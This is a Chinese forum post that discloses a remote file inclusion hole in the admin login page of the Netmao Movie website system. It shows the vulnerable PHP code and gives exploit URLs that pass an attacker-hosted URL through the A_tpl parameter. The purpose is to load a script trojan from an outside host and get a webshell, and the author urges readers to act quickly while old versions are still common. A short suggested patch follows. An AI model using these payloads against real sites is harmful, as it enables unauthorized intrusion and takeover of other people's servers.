Netmao Movie网猫电影系统漏洞
<FONT size=2>IceskYsl在NOHACK上发表的php漏洞专题。第一次就是包含文件漏洞。<BR><BR>那今天我就很快找到了一个,不敢独享!呵呵。<BR><BR>程序:Netmao Movie网猫电影系统。<BR><BR>说明下:现在它的最新版本是3.0,由于加密了,所以就不好继续研究。<BR>不过网上使用的很多都不是最新的版本。所以想拿shell的要赶快哦。<BR><BR>漏洞文件:admin目录下的login.php文件。<BR><BR>代码:<BR><BR>if($action=='login'){<BR><BR> @session_start();<BR> if($_SESSION['randomstr']!=$checkcode){<BR> cpmsg('对不起,验证码错误','?file=login');<BR> exit();<BR> }<BR><BR> $referer=$referer?$referer:'?file=';<BR><BR> $username=addslashes($username);<BR> $password=addslashes($password);<BR> $password=MD5($password);<BR><BR> $result=$db->query("Select * FROM $table_member Where user='$username' AND pwd='$password'");<BR> if($db->num_rows($result)==1){<BR> $r=$db->fetch_array($result);<BR> $_SESSION=$r[$user];<BR> if($r=='1'){$_SESSION='1';}<BR> cpmsg("登录成功!",$referer);<BR> }else{<BR> session_destroy();<BR> cpmsg("对不起,帐号和密码不匹配!",$referer);<BR> }<BR><BR>}elseif($action=='logout'){<BR><BR> session_destroy();<BR> cpmsg("你已经成功退出!",'?file=login');<BR><BR>}<BR>else<BR>{<BR><BR> include $A_tpl.'/login.tpl.php';<BR> <BR>}<BR><BR>我们直奔else语句里的代码。变量A_tpl 没赋值,直接拿来用。<BR>直接输入admin/login.php可以暴出路径。<BR><BR>EXP:<BR>⑴<BR>admin/login.php?A_tpl=http://www.xxxx.com/cmd.txt?<BR>⑵<BR>在一个不支持php脚本的空间建立一个login.tpl.php(当然是自己的脚本木马咯)<BR>访问admin/login.php?A_tpl=http://www.xxxx.com 即可。<BR><BR><BR>好了,结束。。初来~请各位牛人多多指教。<BR>---------------------------------------------------------------------------------------------------<BR>修补漏洞的方案:<BR><BR>function StopRemoteInclude($InclueName){<BR> if(strpos($InclueName,'\\')!==false){ <BR> return substr($InclueName,0,strrpos($InclueName,'\\')); <BR> }elseif(strpos($InclueName,'/')!==false){<BR> return substr($InclueName,0,strrpos($InclueName,'/'));<BR> }else{<BR> return '/';<BR> }<BR>}<BR><BR>define('S_Dir',__FILE__?StopRemoteInclude(__FILE__).'/' : './');</FONT><BR>re:Netmao Movie网猫电影系统漏洞
海哥,生日快乐!
页:
[1]